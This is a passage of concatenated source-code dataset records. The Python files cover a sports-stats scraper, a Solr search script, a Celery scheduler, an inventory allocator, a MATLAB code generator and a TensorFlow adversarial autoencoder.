score1\n\t\t\t\t\t\t\t\t\tawayPast5Games=past5Games2Result\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = score2\n\t\t\t\t\t\t\t\t\t#print(matchHome, name1)\n\t\t\t\t\t\t\t\telif matchAway.find(name1[:2])>-1 and matchHome.find(name2[:2])>-1:\n\t\t\t\t\t\t\t\t\thomePast5Games=past5Games2Result\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = score2\n\t\t\t\t\t\t\t\t\tawayPast5Games=past5Games1Result\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = score1\n\t\t\t\t\t\t\t\t\t#print(matchAway, name1)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\thomePast5Games = \"Can't tell!\"\n\t\t\t\t\t\t\t\t\tawayPast5Games = \"Can't tell!\"\n\t\t\t\t\t\t\t\t\thomePast5GamesTotalScore = \"Can't tell!\"\n\t\t\t\t\t\t\t\t\tawayPast5GamesTotalScore = \"Can't tell!\"\n\t\t\t\t\t\t\t\t\t#print(matchHome, matchAway, name1, name2)\n\n\t\t\t\t\t\t\th2hPages = contentContainer.find_elements_by_xpath('.//div[@class=\"js-event-page-h2h-container\"]')\n\t\t\t\t\t\t\tif len(h2hPages)>0:\n\t\t\t\t\t\t\t\tfor page in h2hPages:\n\t\t\t\t\t\t\t\t\tif len(page.find_elements_by_xpath('./h3'))>0 and gIHTML(page.find_element_by_xpath('./h3')).strip()==\"Manager h2h\":\n\t\t\t\t\t\t\t\t\t\thomeManager = gIHTML(page.find_element_by_xpath('.//div[@class=\"cell__section--main u-tL\"]/div[@class=\"cell__content u-fs12\"]')).strip()\n\t\t\t\t\t\t\t\t\t\tawayManager = gIHTML(page.find_element_by_xpath('.//div[@class=\"cell__section--main u-tR\"]/div[@class=\"cell__content u-fs12\"]')).strip()\n\t\t\t\t\t\t\t\t\t\t#print(homeManager, awayManager)\n\n\n\t\t\t\t\t\t\tmatchInfo = contentContainer.find_elements_by_xpath('.//div[@class=\"js-event-page-info-container\"]')\n\t\t\t\t\t\t\tif len(matchInfo)>0:\n\t\t\t\t\t\t\t\ttableItems = matchInfo[0].find_elements_by_xpath('.//table/tbody/tr')\n\t\t\t\t\t\t\t\tfor item in tableItems:\n\t\t\t\t\t\t\t\t\trowItem = item.find_elements_by_xpath('./td')\n\t\t\t\t\t\t\t\t\tif gIHTML(rowItem[0])==\"Referee\":\n\t\t\t\t\t\t\t\t\t\tmatchReferee= gIHTML(rowItem[1]).strip()\n\t\t\t\t\t\t\t\t\t\t#print(\"matchReferee: \", matchReferee)\n\t\t\t\t\t\t\t\t\telif gIHTML(rowItem[0]) == \"Avg. cards\":\n\t\t\t\t\t\t\t\t\t\trefAvgCards = gIHTML(rowItem[1]).strip()\n\t\t\t\t\t\t\t\t\t\trefAvgCards = refAvgCards[refAvgCards.find('')+7:]\n\t\t\t\t\t\t\t\t\t\trefAvgRedCards = refAvgCards[:refAvgCards.find(' $nrn_ofile\\n'%(fname))\n nrn_run_fid.write('./table_line.sh $nrn_ofile\\n')\n\n arb_run_fid.write('arb_ofile=$ns_ring_out/arb_'+run_name+'.out\\n')\n arb_run_fid.write('run_with_mpi arb_ring %s > $arb_ofile\\n'%(fname))\n arb_run_fid.write('./table_line.sh $arb_ofile\\n')\n\n nrn_run_fid.write('echo\\n')\n arb_run_fid.write('echo\\n')\n\nnrn_run_fid.close()\narb_run_fid.close()\n","sub_path":"benchmarks/ring/generate_inputs.py","file_name":"generate_inputs.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"347937717","text":"#filename:python3 11pop_sum_dict.py\n# -*- coding: utf-8 -*-\n\nfile = open('0601a.csv', 'r')\ndata1 = []\ndata2 = []\nsum0 = 0\nfor line in file.readlines():\n\tline = line.strip('\\n')\n\tline = line.split(',')\n\titerm1 = line.pop(0)\n\titerm2 = line.pop(0)\n\titerm2_float = float(iterm2)\n\tsum0 = sum0 + iterm2_float\n\tprint(sum0)\n\nprint(sum0)\n\nhousework_dic = {}\nhousework_dic[iterm1] = sum0\nprint(housework_dic)\n\t\nfile.close()","sub_path":"DU_card/python/csv/11pop_sum_dict.py","file_name":"11pop_sum_dict.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"367012884","text":"import requests\nimport time\nimport sys\n\n\ndef convertHexData(row_birthmark):\n hex_row = \"\"\n for j in row_birthmark:\n for i in j.split(' '):\n try:\n hex_row += hex(int(i)).replace('0x', '')\n except:\n return row_birthmark\n hex_row += ','\n return hex_row\n\n\nimport os\nos.makedirs('search_result', exist_ok=True)\n\n# python3 postFile length birthmark\npostFile = sys.argv[1]\nlength = sys.argv[2]\nbirthmark = sys.argv[3]\nwith open(postFile, 'r') as f:\n import csv\n for row in csv.reader(f):\n if len(row[3:]) < int(length):\n continue\n if birthmark == 'uc':\n postData = ','.join(row[3:])\n else:\n postData = convertHexData(row[3:])\n # print(postData)\n\n if birthmark == 'uc':\n payload = {'indent': 'on', 'q': 'data:'+postData, 'sort': 'score desc',\n 'wt': 'json', 'rows': '1000', 'fl': '*,score'}\n else:\n payload = {'indent': 'on', 'q': 'encode_data:'+postData, 'sort': 'score desc',\n 'wt': 'json', 'rows': '1000', 'fl': '*,score'}\n\n start = time.time()\n sumQtime = 0\n\n if birthmark == 'uc':\n r = requests.post(\n 'http://localhost:8983/solr/' + birthmark +\n '/query?fl=output,score,place,barthmark,data&rows=1000000&sort=score%20desc&wt=json',\n json={'query': 'data: ' + postData})\n else:\n r = requests.post(\n 'http://localhost:8983/solr/' + birthmark +\n '/query?fl=output,score,place,barthmark,data&rows=1000000&sort=score%20desc&wt=json',\n json={'query': 'encode_data: ' + postData})\n # print(r.json())\n maxScore = float(r.json()['response']['maxScore'])\n # print(maxScore)\n # print(float(r.json()['response']['docs'][-1]['score']))\n starts = 1000\n\n with open('search_result/'+row[0]+birthmark, 'a') as write_file:\n write_file.write(','.join(row) + '\\n')\n for result in r.json()['response']['docs']:\n # if float(result['score']) / maxScore < 0.001:\n # break\n write_file.write('{0},{1},{2},{3}\\n'.format(\n result['output'], float(result['score'])/maxScore, result['barthmark'], result['data'].replace('quot;', '')))\n # while True:\n # # print(maxScore)\n # with open('search_result/'+row[0]+birthmark, 'a') as write_file:\n # write_file.write(','.join(row) + '\\n')\n # for result in r.json()['response']['docs']:\n # if float(result['score']) / maxScore < 0.001:\n # break\n # write_file.write('{0},{1},{2},{3}\\n'.format(\n # result['output'], float(result['score'])/maxScore, result['barthmark'], result['data'].replace('quot;', '')))\n # # if float(float(r.json()['response']['docs'][-1]['score']) / maxScore) < 0.001:\n # # break\n # if int(starts) > 4510:\n # break\n # if birthmark == 'uc':\n # payload = {'indent': 'on', 'q': 'data:'+postData,\n # 'wt': 'json', 'rows': '1000', 'fl': '*,score', 'start': starts}\n # else:\n # payload = {'indent': 'on', 'q': 'encode_data:'+postData,\n # 'wt': 'json', 'rows': '1000', 'fl': '*,score', 'start': starts}\n # r = requests.post(\n # 'http://localhost:8983/solr/' + birthmark +\n # '/query?fl=output,score,place,barthmark,data&rows=1000&sort=score%20desc&wt=json&start=' +\n # str(starts),\n # json={'query': 'encode_data: ' + postData})\n # # r = requests.get(\n # # 'http://localhost:8983/solr/' + birthmark + '/select', params=payload)\n # starts += 1000\n # # qtime\n # sumQtime += r.json()['responseHeader']['QTime']\n # # print('{0}, {1}'.format(maxScore, float(\n # # r.json()['response']['docs'][-1]['score'])))\n # # print(sumQtime)\n # elapsed_time = time.time() - start\n # # print(\"elapsed_time:{0}\".format(elapsed_time) + \"[sec]\")\n\n elapsed_time = time.time() - start\n # print(\"elapsed_time:{0}\".format(elapsed_time) + \"[sec]\")\n","sub_path":"docs/docs_for_research/procudure-of-experimental/FN/row_search_once.py","file_name":"row_search_once.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"639300631","text":"class EnvArgs:\n\tdef __init__(self):\n\t\t# env settings\n\t\tself.s_info = 12\n\t\tself.s_len = 200 # frame based info\n\t\tself.s_gop_len = 8 # frame based info\n\t\tself.s_gop_info = 12\n\t\tself.a_dim = 8\n\t\tself.random_seed = 50\n\t\tself.bitrate_levels = 4\n\t\tself.bitrate = [500.0, 850.0, 1200.0, 1850.0] # kbps\n\t\tself.target_buffer_levels = 2\n\t\tself.target_buffer = [2.0, 3.0] # seconds\n\n\t\tself.frame_time_len = 0.04\n\t\tself.smooth_penalty = 0.02\n\t\tself.rebuf_penalty = 1.5\n\t\tself.latency_penalty = 0.005\n\n\t\tself.bw_trace = '../../trace/network_trace/high/'\n\t\tself.video_size_files = \\\n\t\t['../../trace/video_trace/AsianCup_China_Uzbekistan/frame_trace_',\n\t\t'../../trace/video_trace/Fengtimo_2018_11_3/frame_trace_',\n\t\t'../../trace/video_trace/YYF_2018_08_12/frame_trace_']\n\t\t# self.log_path = './log/'","sub_path":"env_args_pretrain.py","file_name":"env_args_pretrain.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"74123168","text":"import os\nimport requests\nfrom PIL import Image\nfrom library import settings\n\n\ndef thumbnail_path(id):\n return os.path.join(settings.STATIC_ROOT, 'images', 'thumbnails', f'{id}.png')\n\n\ndef exists(id):\n path = thumbnail_path(id)\n return os.path.exists(path) and os.path.getsize(path) > 1024\n\n\ndef generate(id):\n url = f'{settings.BASE_HUB_URL}/services/sharing/notebooks/{id}/preview/image/'\n\n # Lazily create thumbnail directory\n filename = thumbnail_path(id)\n create_directory(os.path.dirname(filename))\n\n # Download the preview image\n r = requests.get(url)\n thumb_file = open(filename, 'wb')\n thumb_file.write(r.content)\n thumb_file.close()\n\n # Overwrite it with the thumbnail\n create_thumbnail(filename)\n\n\ndef create_directory(directory_path):\n if not os.path.exists(directory_path):\n os.mkdir(directory_path)\n\n\ndef create_thumbnail(filename):\n desired_size = 200\n\n im = Image.open(filename)\n old_width, old_height = im.size # old_size[0] is in (width, height) format\n\n new_height = int(float(old_height * desired_size) / old_width)\n\n im = im.resize((desired_size, new_height), Image.ANTIALIAS)\n im = im.crop((0, 0, desired_size, desired_size))\n\n # create a new image and paste the resized on it\n new_im = Image.new(\"RGB\", (desired_size, desired_size), (255, 255, 255, 0))\n new_im.paste(im, (0, 0))\n\n new_im.save(filename)\n","sub_path":"library/thumbnail.py","file_name":"thumbnail.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"426408455","text":"import ast\n\ndef str_to_expr(s):\n return ast.parse(s).body[0]\n\ndef convert_ast_to_sympy(a):\n pass\n\n\nclass WriteMatlab(ast.NodeVisitor):\n\n def visit_BinOp(self,b):\n lhs = self.visit(b.left)\n rhs = self.visit(b.right)\n print( \"{} + {}\".format(lhs,rhs) )\n\n\ndef print_matlab(sexpr):\n from dolo.compiler.codegen import to_source\n ss = (to_source(sexpr))\n ss = ss.replace(' ** ', '.^')\n ss = ss.replace(' * ', '.*')\n ss = ss.replace(' / ', './')\n return ss\n\ndef expr_to_sympy(sexpr):\n from dolo.compiler.codegen import to_source\n ss = (to_source(sexpr))\n import sympy\n return sympy.sympify(ss)\n\n\ndef compile_function_matlab(equations, symbols, arg_names, output_names=None, funname='anonymous'):\n\n from function_compiler_ast import std_date_symbol\n from function_compiler_ast import StandardizeDates\n\n from collections import OrderedDict\n table = OrderedDict()\n\n aa = arg_names\n # if output_names is not None:\n # aa = arg_names + [output_names]\n for a in aa:\n\n symbol_group = a[0]\n date = a[1]\n an = a[2]\n\n for b in symbols[symbol_group]:\n index = symbols[symbol_group].index(b)\n\n table[(b,date)] = (an, index)\n\n table_symbols = { k: (std_date_symbol(*k)) for k in table.keys() }\n\n code_preamble = \"\"\n for k,v in table.iteritems():\n std_name = table_symbols[k]\n if v[0] != 'p':\n code_preamble += \"{} = {}(:,{});\\n\".format(std_name, v[0], v[1]+1)\n else:\n code_preamble += \"{} = {}({});\\n\".format(std_name, v[0], v[1]+1)\n\n if output_names:\n out_group, out_time, out_s = output_names\n else:\n out_s = 'out'\n\n code_expr = \"\"\n for i,eq in enumerate(equations):\n expr = str_to_expr(eq)\n sd = StandardizeDates(symbols, arg_names)\n sexpr = sd.visit(expr)\n eq_string = (print_matlab(sexpr))\n if output_names is None:\n code_expr += \"out(:,{}) = {} ;\\n\".format(i+1, eq_string)\n else:\n out_symbol = symbols[out_group][i]\n out_name = std_date_symbol(out_symbol, out_time)\n code_expr += \"{} = {} ;\\n\".format(out_name, eq_string)\n code_expr += \"{}(:,{}) = {} ;\\n\".format(out_s,i+1, out_name)\n\n code = \"\"\"\\\nfunction [{out_s}] = {funname}({args_list})\n\n{preamble}\n\nN = size({first_arg},1);\nout = zeros(N,{n_out});\n{equations}\nend\n\"\"\".format(\n out_s = out_s,\n preamble = code_preamble,\n funname = funname,\n args_list = str.join(', ', [e[2] for e in arg_names]),\n n_out = len(equations),\n first_arg = arg_names[0][2],\n equations = code_expr\n)\n\n return code\n\ndef compile_model_matlab(model):\n\n symbolic_model = model.symbolic\n\n model_type = symbolic_model.model_type\n\n if model_type != 'fga':\n raise Exception(\"For now, only supported model type is fga\")\n\n from collections import OrderedDict\n code_funs = OrderedDict()\n\n\n from dolo.compiler.recipes import recipes\n recipe = recipes['fga']\n symbols = model.symbols\n\n for funname, v in recipe['specs'].iteritems():\n\n spec = v['eqs']\n print(spec)\n if 'complementarities' in v:\n print(\"ignoring complementarities\")\n\n target = v.get('target')\n\n if funname not in symbolic_model.equations:\n continue\n # if not spec.get('optional'):\n # raise Exception(\"The model doesn't contain equations of type '{}'.\".format(funname))\n # else:\n # continue\n\n eq_strings = symbolic_model.equations[funname]\n\n eq_strings = [eq.split('|')[0].strip() for eq in eq_strings]\n\n if target is not None:\n eq_strings = [eq.split('=')[1].strip() for eq in eq_strings]\n else:\n for i,eq in enumerate(eq_strings):\n if '=' in eq:\n eq = '({1})-({0})'.format(*eq.split('=')[:2])\n eq_strings[i] = eq\n\n\n funcode = compile_function_matlab(eq_strings, symbols,\n spec, output_names=target, funname=funname)\n\n code_funs[funname] = funcode\n\n\n code = \"\"\"\\\nfunction [model] = construct_model()\n\n functions = struct;\n\"\"\"\n for fn in code_funs.keys():\n code += \" functions.{} = @{};\\n\".format(fn, fn)\n\n code += \"\\n symbols = struct;\\n\"\n for sg, sl in symbols.iteritems():\n code += \" symbols.{} = {{{}}};\\n\".format(sg, str.join(',', [\"'{}'\".format(e) for e in sl]))\n code += \"\\n\"\n code += \"\\n calibration = struct;\"\n for sg, sl in model.calibration.iteritems():\n tv = [str(float(e)) for e in sl]\n tv = '[{}]'.format(str.join(', ', tv))\n code += \" calibration.{} = {};\\n\".format(sg, tv);\n\n # print covariances\n tv = [str(float(e)) for e in model.covariances.flatten()]\n tv = '[{}]'.format(str.join(', ', tv))\n n_c = model.covariances.shape[0]\n code += \"\\n covariances = reshape( {} , {}, {})\\n\".format(tv, n_c, n_c)\n\n code += \"\"\"\\\n\n model = struct;\n model.functions = functions;\n model.calibration = calibration;\n model.symbols = symbols;\n model.covariances = covariances;\n\nend\n\n\"\"\"\n\n for fn, fc, in code_funs.iteritems():\n code += '\\n'\n code += fc\n\n return code\n\n\n\nif __name__ == '__main__':\n\n s1 = '(x0(1) + x1 / y0)**p0 - (x0(1) + x1 / y0)**(p0-1) '\n s2 = 'x0 + x1 / y1(+1)'\n\n expressions = [s1,s2]\n\n from collections import OrderedDict\n\n symbols = OrderedDict(\n states = ('x0', 'x1'),\n controls = ('y0','y1'),\n parameters = ('p0','p1')\n )\n\n arg_names = [\n ('states', 0, 's'),\n ('controls', 0, 'x'),\n ('states', 1, 'S'),\n ('controls', 1, 'X'),\n ('parameters', 0, 'p')\n ]\n\n import time\n\n t0 = time.time()\n resp = compile_function_matlab([s1,s2], symbols, arg_names) #funname='arbitrage', use_numexpr=True, return_ast=True)\n\n\n ###\n\n\n s1 = '(x0(1) + x1 / y0)**p0 - (x0(1) + x1 / y0)**(p0-1) '\n s2 = 'x0 + x1 / y1'\n\n expressions = [s1,s2]\n\n symbols = OrderedDict(\n states = ('x0', 'x1'),\n controls = ('y0','y1'),\n parameters = ('p0','p1')\n )\n\n arg_names = [\n ('states', 0, 's'),\n ('controls', 0, 'x'),\n ('states', 1, 'S'),\n ('parameters', 0, 'p')\n ]\n\n import time\n\n t0 = time.time()\n resp = compile_function_matlab([s1,s2], symbols, arg_names, output_names=('controls',1,'Y')) #funname='arbitrage', use_numexpr=True, return_ast=True)\n\n print(resp)\n\n print('***************#######################************************')\n\n from dolo import *\n model = yaml_import('examples/models/rbc.yaml')\n print( compile_model_matlab(model) )\n","sub_path":"dolo/compiler/function_compiler_matlab.py","file_name":"function_compiler_matlab.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"392145093","text":"from django_celery_beat.models import PeriodicTask, IntervalSchedule\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom api.scheduler.models import Scheduler\nimport datetime\nimport json\nimport uuid\nfrom .serializers import SchedulerSerializers\n\n\nregistered_task = 'scheduler_task'\ndatetime_now = datetime.datetime.now().replace(microsecond=0)\n\nfrom django.contrib.gis.geos import GEOSGeometry\ndef create_scheduler(aoi, product_name, start_time=datetime_now, every=1, period='minutes'):\n name = uuid.uuid4()\n kwargs_task = json.dumps({\n 'product_name': product_name,\n 'aoi': aoi\n })\n interval = IntervalSchedule.objects.create(every=every, period=period)\n PeriodicTask.objects.get_or_create(name=name, task=registered_task, interval=interval, start_time=start_time, kwargs=kwargs_task)\n Scheduler.objects.get_or_create(name=name, task=registered_task, start_time=start_time,\n every=every, period=period, aoi=GEOSGeometry(aoi), product_name=product_name)\n return {\n 'Status': 'Success'\n }\n\ndef list_scheduler():\n try:\n response = SchedulerSerializers(instance=Scheduler.objects, many=True).data\n return response\n except ObjectDoesNotExist:\n return {\n 'status': 'Failed',\n 'message': 'Not found scheduler ' + str(id)\n }\n\ndef get_scheduler(id):\n try:\n response = SchedulerSerializers(instance=Scheduler.objects.get(pk=id), many=False).data\n return response\n except ObjectDoesNotExist:\n return {\n 'status': 'Failed',\n 'message': 'Not found scheduler ' + str(id)\n }\n\ndef update_scheduler(id, every=None, period=None, enabled=None):\n try:\n scheduler = Scheduler.objects.get(pk=id)\n periodic_task = PeriodicTask.objects.get(name=scheduler.name)\n interval = IntervalSchedule.objects.get(pk=periodic_task.interval_id)\n if every is not None:\n scheduler.every = every\n interval.every = every\n if period is not None:\n scheduler.period = period\n interval.period = period\n if enabled is not None:\n scheduler.enabled = enabled\n periodic_task.enabled = enabled\n periodic_task.save()\n interval.save()\n scheduler.save()\n return {\n 'Status': 'Success',\n 'message': 'Update scheduler successfully '\n }\n except ObjectDoesNotExist:\n return {\n 'status': 'Failed',\n 'message': 'Not found scheduler ' + str(id)\n }\n\ndef delete_scheduler(id):\n try:\n scheduler = Scheduler.objects.get(pk=id)\n periodic_task = PeriodicTask.objects.get(name=scheduler.name)\n interval = IntervalSchedule.objects.get(pk=periodic_task.interval_id)\n\n scheduler.delete()\n periodic_task.delete()\n interval.delete()\n print('I do this')\n return {\n 'status': 'Success',\n 'message': 'Delete Scheduler successfully'\n }\n\n except ObjectDoesNotExist:\n return {\n 'status': 'Failed',\n 'message': 'Not found scheduler ' + str(id)\n }\n\n\n# TEST\n\nfrom celery import task\nfrom celery.utils.log import get_task_logger\n\n# @task(name='get_date_now')\n# def get_date_now():\n# return datetime.datetime.now()\n# logger = get_task_logger(__name__)\n#\n# @task(name='test_scheduler')\n# def test_scheduler(x):\n# time = datetime.datetime.now().replace(microsecond=0)\n# logger.info(time)\n# return x + 1000\n\n\n# def create_scheduler(x, start_time=datetime_now, every=1, period='minutes'):\n# name = uuid.uuid4()\n# interval = IntervalSchedule.objects.get_or_create(every=every, period=period)\n# # time = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\")\n# kwargs_task = json.dumps({\n# 'x': x\n# })\n# print(kwargs_task)\n# PeriodicTask.objects.get_or_create(name=name, task=registered_task, interval=interval[0], start_time=start_time, kwargs=kwargs_task)\n# # Scheduler.objects.get_or_create(name=name, task=registered_task, start_time=start_time, every=every, period=period, aoi=aoi, product_name=product_name)\n# return {\n# 'Status': 'Success'\n# }\n\n\n","sub_path":"api/scheduler/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"118304133","text":"import copy\n\n#Inventory class has all the components that compute the cheapest order available (via first warehouse in the list/input).\nclass Inventory(object):\n def __init__(self, order, inventory):\n\n # This is the constructor for the allocator, in this we set the self inventory and self order to the given order of user (inputs provided)\n # if the inventory details or order is empty/not provided, it will return an empty list. \n self.inventory=inventory\n self.order=order\n \n #if not self.order or not self.inventory:\n # return []\n\n def OrderShipment(self):\n \n #OrderShipment: This member function/function checks if the order is available in warehouses or not.\n #--The conditions that this function fullfills are:\n #----1. If the order and inventory details are provided correctly or not. If not, then it returns an empty list. \n #----2. In case if the order is not available in any warehouse, it returns an empty list\n #----3. Since we are considering that warehouses are orderd in less to most expensive basis, so if the order can be fulfilled by the first warehouse that comes in the list, all the order is sent from that warehouse.\n #----4. If order is not fulfilled by single warehouse, whatever is available in that warehouse, it is sent from there, the rest is sent from the next least expensive warehouse in the list.\n #----5. Once the order has been checked, a counter checked is made to check if all the ordered iteams are selected or not. If not it returns an empty list.\n\n # if the inventory details or order is empty/not provided, it will return an empty list.\n if not self.order or not self.inventory:\n return [] \n \n #if inventory and order details are provided correctly, further calculations are done.\n else:\n \n #copies the order placed and invetory details provided by the user/input\n warehouses= copy.copy(self.inventory)\n checkorder= copy.copy(self.order)\n \n #a list to hold the shipment details when they are confirmed (if availabe) \n confirmshipment=[]\n\n #iterating through each warehouse\n for warehouse in warehouses:\n\n #dictionary that stores the items that can be shiped from a warehouse\n availablestock={}\n\n #iterating through users order list/input\n for key in checkorder.keys():\n #if the item is needed/in the order list\n if checkorder[key]>0 :\n #check if the item checkorder[key] is available in this warehouse\n if key in warehouse['inventory'].keys():\n\n #check if the warehouse has enough of this item to fulfill the demand or not\n if warehouse['inventory'][key]>checkorder[key]:\n\n #availability of item = true\n availablestock[key]= checkorder[key]\n\n #subtract the amount of item needed from the amount of item available in that warehouse/inventory.\n warehouse['inventory'][key]= warehouse['inventory'][key]-checkorder[key]\n\n #it is set to zero so that the next item can be searched/checked\n checkorder[key]=0\n else:\n\n #if the warehouse doesnt have the complete stock that is required in order, we take whatever it can fulfill and search in next warehouse to complete the order\n availablestock[key]=warehouse['inventory'][key]\n\n #subtract from what's required so that what's left can be searched in next warehouse\n checkorder[key]=checkorder[key] - warehouse['inventory'][key]\n\n #set the amount of item in that warehouse=0 because we'll take what it can fulfill.\n warehouse['inventory'][key]=0\n #comfirm the order once all the warehouses are searched\n confirmshipment.append({warehouse['name']:availablestock})\n #counter check if still anything is left in the order list, if yes it returns an empty list. \n for key in checkorder.keys():\n if checkorder[key]>0:\n return [] \n #All clear, return the order along with name of warehouse/inventory and items that are ordered \n return confirmshipment\n\nif __name__ == '__main__':\n Myorder=Inventory({ 'apple': 2 }, [{ 'name': 'owd', 'inventory': { 'apple': 5 } }])\n print (\"Order Details:\", Myorder.OrderShipment())\n\n SecondOrder=Inventory({ 'apple': 1 }, [{ 'name': 'owd', 'inventory': { 'apple': 0 } }])\n print (\"Second Order Details: \", SecondOrder.OrderShipment())\n\n ThirdOrder=Inventory({ 'apple': 1 }, [{ 'name': 'owd', 'inventory': { 'apple': 1 } }])\n print (\"Third Order Details: \", ThirdOrder.OrderShipment())\n\n Forthorder=Inventory({ 'apple': 2, 'berry': 5, 'banana': 15 }, [{ 'name': 'owd', 'inventory': { 'apple': 15, 'berry': 25, 'banana': 30, 'Mangoes': 50 } }])\n print (\"Forth Order Details:\", Forthorder.OrderShipment()) \n\n","sub_path":"inventory-allocator/src/MyInventoryAllocator.py","file_name":"MyInventoryAllocator.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"562415659","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport os\nimport data_loader\nimport random\nimport math\nimport get_parameters\nimport pickle\nimport gzip\n\nlattice_size = 8\nlearning_rate = 1e-4\nbatch_size = 100\nn_z = 1\nx = tf.placeholder(name='x', dtype=tf.float32, shape=[None, 64])\ny = tf.placeholder(name='y', dtype=tf.float32, shape=[None,1])\nz_prior = tf.placeholder(name='y', dtype=tf.float32, shape=[1,batch_size])\nloss_type = 'log_gaussian' #'Binary_crossentropy'\ndatapoints = 320000\nn_temps = 32\nT_vals = np.linspace(-1.0,0.9,n_temps)\nIs_train = True\nwith tf.variable_scope('Encoder'):\n fully_connected1 = tf.contrib.layers.fully_connected(inputs=x, num_outputs=128, activation_fn=tf.tanh,scope=\"Fully_Conn1\")\n fully_connected2 = tf.contrib.layers.fully_connected(inputs=fully_connected1, num_outputs=64, activation_fn=tf.tanh,scope=\"Fully_Conn2\")\n fully_connected3 = tf.contrib.layers.fully_connected(inputs=fully_connected2, num_outputs=20, activation_fn=tf.tanh,scope=\"Fully_Conn3\")\n z_mu = tf.contrib.layers.fully_connected(inputs=fully_connected3, num_outputs=n_z, activation_fn=None,scope=\"Fully_Conn2_mu\")\n z_log_sigma_sq = tf.contrib.layers.fully_connected(inputs=fully_connected3, num_outputs=n_z, activation_fn=None,scope=\"Fully_Conn2_sig\")\n\n eps = tf.random_normal(shape=tf.shape(z_log_sigma_sq),mean=0, stddev=1.0, dtype=tf.float32)\n z = z_mu + tf.sqrt(tf.exp(z_log_sigma_sq)) * eps\n\nepsilon = 1e-10\nu=tf.concat([y,z],axis=1)\nwith tf.variable_scope('Decoder'):\n fully_connected_decoder1 = tf.contrib.layers.fully_connected(inputs=u, num_outputs=20, activation_fn=tf.tanh,scope=\"Fully_Conn1_decoder\")\n fully_connected_decoder2 = tf.contrib.layers.fully_connected(inputs=fully_connected_decoder1,num_outputs=64, activation_fn=tf.tanh,scope=\"Fully_Conn2_decoder\")\n fully_connected_decoder3 = tf.contrib.layers.fully_connected(inputs=fully_connected_decoder2,num_outputs=128,activation_fn=tf.tanh,scope=\"Fully_Conn3_decoder\")\n\n if loss_type == 'Binary_crossentropy':\n x_hat = tf.contrib.layers.fully_connected(inputs=fully_connected_decoder3, num_outputs=64, activation_fn=tf.sigmoid,scope=\"Fully_Conn2_decoder_out\")\n recon_loss =-1*tf.reduce_sum( x*tf.log(epsilon+x_hat) +(1-x)*tf.log(epsilon+1-x_hat),axis=1)#\n elif loss_type == 'log_gaussian':\n x_mu = tf.contrib.layers.fully_connected(inputs=fully_connected_decoder3, num_outputs=64, activation_fn=tf.sigmoid,scope=\"Fully_Conn2_decoder_mu\")\n x_log_sigma_sq = tf.contrib.layers.fully_connected(inputs=fully_connected_decoder3, num_outputs=64, activation_fn=tf.tanh,scope=\"Fully_Conn2_decoder_std\")\n x_hat =tf.random_normal(shape = tf.shape(x_mu) ,mean = x_mu, stddev =tf.sqrt(tf.exp(-8*x_log_sigma_sq)), dtype = tf.float32 )\n\nwith tf.variable_scope('vae_loss'):\n recon_loss = 0.5*tf.reduce_mean(tf.reduce_sum( ((x-x_mu)**2)/tf.exp(-8*x_log_sigma_sq)+1.837- 8*x_log_sigma_sq ,axis=1)) #1.837= ln(2*pi)\n\ndef discriminator(g,reuse = None):\n with tf.variable_scope('Discriminator', reuse=reuse):\n net = tf.contrib.layers.fully_connected(inputs=g , num_outputs=40, activation_fn=tf.nn.relu ,scope=\"inp\")\n net1 = tf.contrib.layers.fully_connected(inputs=net , num_outputs=32, activation_fn=tf.nn.relu ,scope=\"hid1\")\n net2 = tf.contrib.layers.fully_connected(inputs=net1, num_outputs=10, activation_fn=tf.nn.relu ,scope=\"hid2\")\n d_out = tf.contrib.layers.fully_connected(inputs=net2, num_outputs=1 , activation_fn=None ,scope=\"prob\")\n return d_out\n\ndef loss_func(logits_in,labels_in):\n return tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits_in,labels=labels_in))\n\ndef return_intersection(hist_1, hist_2):\n minima = np.minimum(hist_1, hist_2)\n intersection = np.true_divide(np.sum(minima), np.sum(hist_2))\n return intersection\n\n# z_prior = tf.random_normal(shape = tf.shape(z) ,mean = 0, stddev =1, dtype = tf.float32 )\nd_real = discriminator(g=z_prior)\nz_cap = tf.reshape(tf.squeeze(z),[1,batch_size])\nd_fake = discriminator(g=z_cap,reuse = True)\n\nwith tf.variable_scope('lossD'):\n D_real_loss=10*loss_func(d_real,tf.ones_like(d_real)*0.9) #Smoothing for generalization\n D_fake_loss=10*loss_func(d_fake,tf.zeros_like(d_real))\n train_d_loss=D_real_loss+D_fake_loss\nwith tf.variable_scope('JSloss'):\n JS_loss = 10*loss_func(d_fake,tf.ones_like(d_fake))\n\nencoder_param = tf.trainable_variables(scope='Encoder')\ndecoder_param = tf.trainable_variables(scope='Decoder')\nd_param = tf.trainable_variables(scope='Discriminator')\nprint(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES))\n\nwith tf.variable_scope('optimizer'):\n vae_optim = tf.train.AdamOptimizer(learning_rate= 1e-4 ).minimize(recon_loss,var_list=[encoder_param,decoder_param])\n d_optim = 